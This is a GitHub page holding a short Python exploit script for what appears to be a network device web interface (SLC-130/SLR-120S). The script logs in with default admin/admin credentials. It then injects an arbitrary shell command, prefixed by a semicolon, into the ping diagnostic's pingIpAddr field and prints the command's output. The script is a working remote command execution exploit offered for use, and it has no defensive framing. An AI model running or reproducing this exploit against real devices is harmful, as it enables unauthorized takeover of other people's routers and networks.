-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathslc-130-SLR-120S-Exploit.py
61 lines (44 loc) · 1.3 KB
/
slc-130-SLR-120S-Exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
import requests
import sys
host = sys.argv[1]
session = requests.Session()
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8",
"Accept-Language": "en-US,en;q:0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "132",
"Origin": "http://192.168.1.1",
"Connection": "close",
"Referer": "http://192.168.1.1/",
"Upgrade-Insecure-Requests": "1"
}
datas = {
"Command":"Submit",
"expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT",
"browserTime":"081119502020",
"currentTime":"1597159205",
"user":"admin",
"password":"admin"
}
#auth
session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas)
#rce
cmd = sys.argv[2]
rce_data = {
"Command":"Diagnostic",
"traceMode":"ping",
"reportIpOnly":"",
"pingIpAddr":";".encode("ISO-8859-1").decode()+cmd,
"pingPktSize":"56",
"pingTimeout":"30",
"pingCount":"4",
"maxTTLCnt":"30",
"queriesCnt":"3",
"reportIpOnlyCheckbox":"on",
"btnApply":"Apply",
"T":"1597160664082"
}
rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data)
print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])